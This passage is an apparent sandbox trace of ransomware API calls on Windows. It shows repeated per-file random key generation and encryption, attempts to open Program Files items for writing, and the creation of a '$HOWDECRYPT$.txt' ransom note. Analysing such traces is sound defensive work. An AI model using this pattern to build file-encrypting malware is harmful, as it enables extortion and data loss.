pbBuffer=0x248e848 | out: pbBuffer=0x248e848) returned 1 [0162.310] GetProcessHeap () returned 0x2c0000 [0162.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.310] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248e840*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248e840*=0x30) returned 1 [0162.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.311] GetProcessHeap () returned 0x2c0000 [0162.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.311] GetProcessHeap () returned 0x2c0000 [0162.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb1f38 | out: hHeap=0x2c0000) returned 1 [0162.311] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e840 | out: pbBuffer=0x248e840) returned 1 [0162.311] GetProcessHeap () returned 0x2c0000 [0162.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.311] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248e838*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248e838*=0x30) returned 1 [0162.311] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.311] GetProcessHeap () returned 0x2c0000 [0162.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.311] GetProcessHeap () returned 0x2c0000 [0162.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb1e58 | out: hHeap=0x2c0000) returned 1 [0162.311] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e840 | out: pbBuffer=0x248e840) returned 1 [0162.312] GetProcessHeap () returned 0x2c0000 [0162.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.312] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248e838*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248e838*=0x30) returned 1 [0162.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\connectionmanager_dmr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.312] GetProcessHeap () returned 0x2c0000 [0162.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.312] GetProcessHeap () returned 0x2c0000 [0162.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae5b8 | out: hHeap=0x2c0000) returned 1 [0162.312] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e838 | out: pbBuffer=0x248e838) returned 1 [0162.313] GetProcessHeap () returned 0x2c0000 [0162.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248e830*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248e830*=0x30) returned 1 [0162.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\avtransport.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.313] GetProcessHeap () returned 0x2c0000 [0162.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.313] GetProcessHeap () returned 0x2c0000 [0162.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb860 | out: hHeap=0x2c0000) returned 1 [0162.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Icons\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows media player\\icons\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.315] GetProcessHeap () returned 0x2c0000 [0162.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7ea38 | out: hHeap=0x2c0000) returned 1 [0162.315] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e830 | out: pbBuffer=0x248e830) returned 1 [0162.315] GetProcessHeap () returned 0x2c0000 [0162.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e828*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e828*=0x30) returned 1 [0162.316] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpmediasharing.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.319] GetProcessHeap () returned 0x2c0000 [0162.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.319] GetProcessHeap () returned 0x2c0000 [0162.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb778 | out: hHeap=0x2c0000) returned 1 [0162.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e830 | out: pbBuffer=0x248e830) returned 1 [0162.319] GetProcessHeap () returned 0x2c0000 [0162.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.319] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e828*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e828*=0x30) returned 1 [0162.319] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\setup_wm.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.327] GetProcessHeap () returned 0x2c0000 [0162.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.327] GetProcessHeap () returned 0x2c0000 [0162.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e450 | out: hHeap=0x2c0000) returned 1 [0162.327] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e828 | out: pbBuffer=0x248e828) returned 1 [0162.327] GetProcessHeap () returned 0x2c0000 [0162.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e820*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e820*=0x30) returned 1 [0162.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll" (normalized: "c:\\program files (x86)\\windows mail\\wabfind.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.331] GetProcessHeap () returned 0x2c0000 [0162.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.331] GetProcessHeap () returned 0x2c0000 [0162.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebed50 | out: hHeap=0x2c0000) returned 1 [0162.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e828 | out: pbBuffer=0x248e828) returned 1 [0162.331] GetProcessHeap () returned 0x2c0000 [0162.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e820*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e820*=0x30) returned 1 [0162.331] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll" (normalized: "c:\\program files (x86)\\windows mail\\msoe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.333] GetProcessHeap () returned 0x2c0000 [0162.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.333] GetProcessHeap () returned 0x2c0000 [0162.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebebf0 | out: hHeap=0x2c0000) returned 1 [0162.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e820 | out: pbBuffer=0x248e820) returned 1 [0162.333] GetProcessHeap () returned 0x2c0000 [0162.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e818*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e818*=0x30) returned 1 [0162.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.362] GetProcessHeap () returned 0x2c0000 [0162.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.362] GetProcessHeap () returned 0x2c0000 [0162.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6050 | out: hHeap=0x2c0000) returned 1 [0162.363] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e820 | out: pbBuffer=0x248e820) returned 1 [0162.363] GetProcessHeap () returned 0x2c0000 [0162.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e818*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e818*=0x30) returned 1 [0162.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.363] GetProcessHeap () returned 0x2c0000 [0162.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.363] GetProcessHeap () returned 0x2c0000 [0162.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5bb8 | out: hHeap=0x2c0000) returned 1 [0162.363] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e818 | out: pbBuffer=0x248e818) returned 1 [0162.363] GetProcessHeap () returned 0x2c0000 [0162.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e810*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e810*=0x30) returned 1 [0162.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.363] GetProcessHeap () returned 0x2c0000 [0162.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.364] GetProcessHeap () returned 0x2c0000 [0162.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb238 | out: hHeap=0x2c0000) returned 1 [0162.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e818 | out: pbBuffer=0x248e818) returned 1 [0162.364] GetProcessHeap () returned 0x2c0000 [0162.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e810*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e810*=0x30) returned 1 [0162.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.364] GetProcessHeap () returned 0x2c0000 [0162.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.364] GetProcessHeap () returned 0x2c0000 [0162.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead9c8 | out: hHeap=0x2c0000) returned 1 [0162.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e810 | out: pbBuffer=0x248e810) returned 1 [0162.364] GetProcessHeap () returned 0x2c0000 [0162.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e808*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e808*=0x30) returned 1 [0162.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.365] GetProcessHeap () returned 0x2c0000 [0162.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.365] GetProcessHeap () returned 0x2c0000 [0162.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88c90 | out: hHeap=0x2c0000) returned 1 [0162.365] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e810 | out: pbBuffer=0x248e810) returned 1 [0162.365] GetProcessHeap () returned 0x2c0000 [0162.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.365] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e808*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e808*=0x30) returned 1 [0162.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.365] GetProcessHeap () returned 0x2c0000 [0162.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.365] GetProcessHeap () returned 0x2c0000 [0162.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3b30 | out: hHeap=0x2c0000) returned 1 [0162.365] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e808 | out: pbBuffer=0x248e808) returned 1 [0162.365] GetProcessHeap () returned 0x2c0000 [0162.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.365] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e800*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e800*=0x30) returned 1 [0162.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.366] GetProcessHeap () returned 0x2c0000 [0162.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.366] GetProcessHeap () returned 0x2c0000 [0162.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead8a0 | out: hHeap=0x2c0000) returned 1 [0162.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e808 | out: pbBuffer=0x248e808) returned 1 [0162.366] GetProcessHeap () returned 0x2c0000 [0162.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e800*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e800*=0x30) returned 1 [0162.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.366] GetProcessHeap () returned 0x2c0000 [0162.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.366] GetProcessHeap () returned 0x2c0000 [0162.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead778 | out: hHeap=0x2c0000) returned 1 [0162.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e800 | out: pbBuffer=0x248e800) returned 1 [0162.366] GetProcessHeap () returned 0x2c0000 [0162.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7f8*=0x30) returned 1 [0162.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.367] GetProcessHeap () returned 0x2c0000 [0162.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.367] GetProcessHeap () returned 0x2c0000 [0162.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaab30 | out: hHeap=0x2c0000) returned 1 [0162.367] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e800 | out: pbBuffer=0x248e800) returned 1 [0162.367] GetProcessHeap () returned 0x2c0000 [0162.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.367] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7f8*=0x30) returned 1 [0162.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.367] GetProcessHeap () returned 0x2c0000 [0162.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.367] GetProcessHeap () returned 0x2c0000 [0162.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaaa28 | out: hHeap=0x2c0000) returned 1 [0162.367] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7f8 | out: pbBuffer=0x248e7f8) returned 1 [0162.367] GetProcessHeap () returned 0x2c0000 [0162.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.367] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7f0*=0x30) returned 1 [0162.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.368] GetProcessHeap () returned 0x2c0000 [0162.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.368] GetProcessHeap () returned 0x2c0000 [0162.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9c80 | out: hHeap=0x2c0000) returned 1 [0162.368] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7f8 | out: pbBuffer=0x248e7f8) returned 1 [0162.368] GetProcessHeap () returned 0x2c0000 [0162.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.368] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7f0*=0x30) returned 1 [0162.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.368] GetProcessHeap () returned 0x2c0000 [0162.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.368] GetProcessHeap () returned 0x2c0000 [0162.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead650 | out: hHeap=0x2c0000) returned 1 [0162.368] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7f0 | out: pbBuffer=0x248e7f0) returned 1 [0162.368] GetProcessHeap () returned 0x2c0000 [0162.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7e8*=0x30) returned 1 [0162.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.369] GetProcessHeap () returned 0x2c0000 [0162.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.369] GetProcessHeap () returned 0x2c0000 [0162.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae3b8 | out: hHeap=0x2c0000) returned 1 [0162.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7f0 | out: pbBuffer=0x248e7f0) returned 1 [0162.369] GetProcessHeap () returned 0x2c0000 [0162.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e7e8*=0x30) returned 